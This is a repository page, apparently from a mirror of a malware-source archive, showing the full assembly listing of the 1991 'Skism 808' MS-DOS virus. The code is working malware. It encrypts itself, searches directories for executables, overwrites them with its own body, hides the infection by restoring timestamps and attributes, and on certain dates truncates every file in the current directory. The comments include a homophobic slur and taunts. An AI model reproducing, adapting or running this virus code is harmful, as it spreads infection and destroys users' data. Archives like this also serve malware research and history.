ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-18 17:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
6332d7096f
MalwareSourceCode/MSDOS/Virus.MSDOS.Unknown.808.asm
vxunderground 039994e413
Add files via upload
2021-01-12 17:29:01 -06:00

306 lines
11 KiB
NASM
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

;tHE sKISM 808 vIRUS. cREATED 1991 BY sMART kIDS iNTO sICK mETHODS.
FILENAME equ 30 ;USED TO FIND FILE NAME
FILEATTR equ 21 ;USED TO FIND FILE ATTRIBUTES
FILEDATE equ 24 ;USED TO FIND FILE DATE
FILETIME equ 22 ;USED TO FIND FILE TIME
CODE_START equ 0100H ;START OF ALL .com FILES
VIRUS_SIZE equ 808 ;tr 808
CODE SEGMENT 'CODE'
ASSUME CS:CODE,DS:CODE,ES:CODE
ORG CODE_START
MAIN PROC NEAR
JMP VIRUS_START
ENCRYPT_VAL DB 00H
VIRUS_START:
CALL ENCRYPT ;ENCRYPT/DECRYPT FILE
JMP VIRUS ;GO TO START OF CODE
ENCRYPT:
PUSH CX
MOV BX,OFFSET VIRUS_CODE ;START ENCRYPTION AT DATA
XOR_LOOP:
MOV CH,[BX] ;READ CURRENT BYTE
XOR CH,ENCRYPT_VAL ;GET ENCRYPTION KEY
MOV [BX],CH ;SWITCH BYTES
INC BX ;MOVE BX UP A BYTE
CMP BX,OFFSET VIRUS_CODE+VIRUS_SIZE
;ARE WE DONE WITH THE ENCRYPTION
JLE XOR_LOOP ;NO? KEEP GOING
POP CX
RET
INFECTFILE:
MOV DX,CODE_START ;WHERE VIRUS STARTS IN MEMORY
MOV BX,HANDLE ;LOAD BX WITH HANDLE
PUSH BX ;SAVE HANDLE ON STACK
CALL ENCRYPT ;ENCRYPT FILE
POP BX ;GET BACK BX
MOV CX,VIRUS_SIZE ;NUMBER OF BYTES TO WRITE
MOV AH,40H ;WRITE TO FILE
INT 21H ;
PUSH BX
CALL ENCRYPT ;FIX UP THE MESS
POP BX
RET
VIRUS_CODE:
WILDCARDS DB "*",0 ;SEARCH FOR DIRECTORY ARGUMENT
FILESPEC DB "*.exe",0 ;SEARCH FOR exe FILE ARGUMENT
FILESPEC2 DB "*.*",0
ROOTDIR DB "\",0 ;ARGUMENT FOR ROOT DIRECTORY
DIRDATA DB 43 DUP (?) ;HOLDS DIRECTORY dta
FILEDATA DB 43 DUP (?) ;HOLDS FILES dta
DISKDTASEG DW ? ;HOLDS DISK DTA SEGMENT
DISKDTAOFS DW ? ;HOLDS DISK DTA OFFSET
TEMPOFS DW ? ;HOLDS OFFSET
TEMPSEG DW ? ;HOLDS SEGMENT
DRIVECODE DB ? ;HOLDS DRIVE CODE
CURRENTDIR DB 64 DUP (?) ;SAVE CURRENT DIRECTORY INTO THIS
HANDLE DW ? ;HOLDS FILE HANDLE
ORIG_TIME DW ? ;HOLDS FILE TIME
ORIG_DATE DW ? ;HOLDS FILE DATE
ORIG_ATTR DW ? ;HOLDS FILE ATTR
IDBUFFER DW 2 DUP (?) ;HOLDS VIRUS ID
VIRUS:
MOV AX,3000H ;GET DOS VERSION
INT 21H ;
CMP AL,02H ;IS IT AT LEAST 2.00?
JB BUS1 ;WON'T INFECT LESS THAN 2.00
MOV AH,2CH ;GET TIME
INT 21H ;
MOV ENCRYPT_VAL,DL ;SAVE M_SECONDS TO ENCRYPT VAL SO
;THERES 100 MUTATIONS POSSIBLE
SETDTA:
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
NEWDIR:
MOV AH,19H ;GET DRIVE CODE
INT 21H ;
MOV DL,AL ;SAVE DRIVECODE
INC DL ;ADD ONE TO DL, BECAUSE FUNCTIONS DIFFER
MOV AH,47H ;GET CURRENT DIRECTORY
MOV SI, OFFSET CURRENTDIR ;BUFFER TO SAVE DIRECTORY IN
INT 21H ;
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
INT 21H ;
SCANDIRS:
MOV CX,13H ;INCLUDE HIDDEN/RO DIRECTORYS
MOV DX, OFFSET WILDCARDS ;LOOK FOR '*'
MOV AH,4EH ;FIND FIRST FILE
INT 21H ;
CMP AX,12H ;NO FIRST FILE?
JNE DIRLOOP ;NO DIRS FOUND? BAIL OUT
BUS1:
JMP BUS
DIRLOOP:
MOV AH,4FH ;FIND NEXT FILE
INT 21H ;
CMP AX,12H
JE BUS ;NO MORE DIRS FOUND, ROLL OUT
CHDIR:
MOV DX,OFFSET DIRDATA+FILENAME;POINT DX TO FCB - FILENAME
MOV AH,3BH ;CHANGE DIRECTORY
INT 21H ;
MOV AH,2FH ;GET CURRENT DTA ADDRESS
INT 21H ;
MOV [DISKDTASEG],ES ;SAVE OLD SEGMENT
MOV [DISKDTAOFS],BX ;SAVE OLD OFFSET
MOV DX,OFFSET FILEDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
SCANDIR:
MOV CX,07H ;FIND ANY ATTRIBUTE
MOV DX,OFFSET FILESPEC ;POINT DX TO "*.com",0
MOV AH,4EH ;FIND FIRST FILE FUNCTION
INT 21H ;
CMP AX,12H ;WAS FILE FOUND?
JNE TRANSFORM
NEXTEXE:
MOV AH,4FH ;FIND NEXT FILE
INT 21H ;
CMP AX,12H ;NONE FOUND
JNE TRANSFORM ;FOUND SEE WHAT WE CAN DO
MOV DX,OFFSET ROOTDIR ;MOVE DX TO CHANGE TO ROOT DIRECTORY
MOV AH,3BH ;CHANGE DIRECTORY TO ROOT
INT 21H ;
MOV AH,1AH ;SET DTA ADDRESS
MOV DS,[DISKDTASEG] ;RESTORE OLD SEGMENT
MOV DX,[DISKDTAOFS] ;RESTORE OLD OFFSET
INT 21H ;
JMP DIRLOOP
BUS:
JMP ROLLOUT
TRANSFORM:
MOV AH,2FH ;TEMPORALLY STORE DTA
INT 21H ;
MOV [TEMPSEG],ES ;SAVE OLD SEGMENT
MOV [TEMPOFS],BX ;SAVE OLD OFFSET
MOV DX, OFFSET FILEDATA + FILENAME
MOV BX,OFFSET FILEDATA ;SAVE FILE...
MOV AX,[BX]+FILEDATE ;DATE
MOV ORIG_DATE,AX ;
MOV AX,[BX]+FILETIME ;TIME
MOV ORIG_TIME,AX ; AND
MOV AX,[BX]+FILEATTR ;
MOV AX,4300H
INT 21H
MOV ORIG_ATTR,CX
MOV AX,4301H ;CHANGE ATTRIBUTES
XOR CX,CX ;CLEAR ATTRIBUTES
INT 21H ;
MOV AX,3D00H ;OPEN FILE - READ
INT 21H ;
JC FIXUP ;ERROR - FIND ANOTHER FILE
MOV HANDLE,AX ;SAVE HANDLE
MOV AH,3FH ;READ FROM FILE
MOV BX,HANDLE ;MOVE HANDLE TO BX
MOV CX,02H ;READ 2 BYTES
MOV DX,OFFSET IDBUFFER ;SAVE TO BUFFER
INT 21H ;
MOV AH,3EH ;CLOSE FILE FOR NOW
MOV BX,HANDLE ;LOAD BX WITH HANDLE
INT 21H ;
MOV BX, IDBUFFER ;FILL BX WITH ID STRING
CMP BX,02EBH ;INFECTED?
JNE DOIT ;SAME - FIND ANOTHER FILE
FIXUP:
MOV AH,1AH ;SET DTA ADDRESS
MOV DS,[TEMPSEG] ;RESTORE OLD SEGMENT
MOV DX,[TEMPOFS] ;RESTORE OLD OFFSET
INT 21H ;
JMP NEXTEXE
DOIT:
MOV DX, OFFSET FILEDATA + FILENAME
MOV AX,3D02H ;OPEN FILE READ/WRITE ACCESS
INT 21H ;
MOV HANDLE,AX ;SAVE HANDLE
CALL INFECTFILE
;MOV AX,3EH ;CLOSE FILE
;INT 21H
ROLLOUT:
MOV AX,5701H ;RESTORE ORIGINAL
MOV BX,HANDLE ;
MOV CX,ORIG_TIME ;TIME AND
MOV DX,ORIG_DATE ;DATE
INT 21H ;
MOV AX,4301H ;RESTORE ORIGINAL ATTRIBUTES
MOV CX,ORIG_ATTR
MOV DX,OFFSET FILEDATA + FILENAME
INT 21H
;MOV BX,HANDLE
;MOV AX,3EH ;CLOSE FILE
;INT 21H
MOV AH,3BH ;TRY TO FIX THIS
MOV DX,OFFSET ROOTDIR ;FOR SPEED
INT 21H ;
MOV AH,3BH ;CHANGE DIRECTORY
MOV DX,OFFSET CURRENTDIR ;BACK TO ORIGINAL
INT 21H ;
MOV AH,2AH ;CHECK SYSTEM DATE
INT 21H ;
CMP CX,1991 ;IS IT AT LEAST 1991?
JB AUDI ;NO? DON'T DO IT NOW
CMP DL,25 ;IS IT THE 25TH?
JB AUDI ;NOT YET? QUIT
CMP AL,5 ;IS fRIDAY?
JNE AUDI ;NO? QUIT
MOV DX,OFFSET DIRDATA ;OFFSET OF WHERE TO HOLD NEW DTA
MOV AH,1AH ;SET DTA ADDRESS
INT 21H ;
MOV AH,4EH ;FIND FIRST FILE
MOV CX,7H ;
MOV DX,OFFSET FILESPEC2 ;OFFSET *.*
lOOPS:
INT 21H ;
JC AUDI ;ERROR? THEN QUIT
MOV AX,4301H ;FIND ALL NORMAL FILES
XOR CX,CX ;
INT 21H ;
MOV DX,OFFSET DIRDATA + FILENAME
MOV AH,3CH ;FUCK UP ALL FILES IN CURRENT DIR
INT 21H ;
JC AUDI ;ERROR? QUIT
MOV AH,4FH ;FIND NEXT FILE
JMP LOOPS ;
AUDI:
MOV AX,4C00H ;END PROGRAM
INT 21H ;
;tHE BELOW IS JUST TEXT TO PAD OUT THE VIRUS SIZE TO 808 BYTES. dON'T
;JUST CHANGE THE TEXT AND CLAIM THAT THIS IS YOUR CREATION.
WORDS_ DB "sKISM rYTHEM sTACK vIRUS-808. sMART kIDS iNTO sICK mETHODS",0
WORDS2 DB " dONT ALTER THIS CODE INTO YOUR OWN STRAIN, FAGGIT. ",0
WORDS3 DB " hr/sss nycITY, THIS IS THE FIFTH OF MANY, MANY MORE....",0
WORDS4 DB " yOU SISSYS.....",0
MAIN ENDP
CODE ENDS
END MAIN

Reference in New Issue View Git Blame Copy Permalink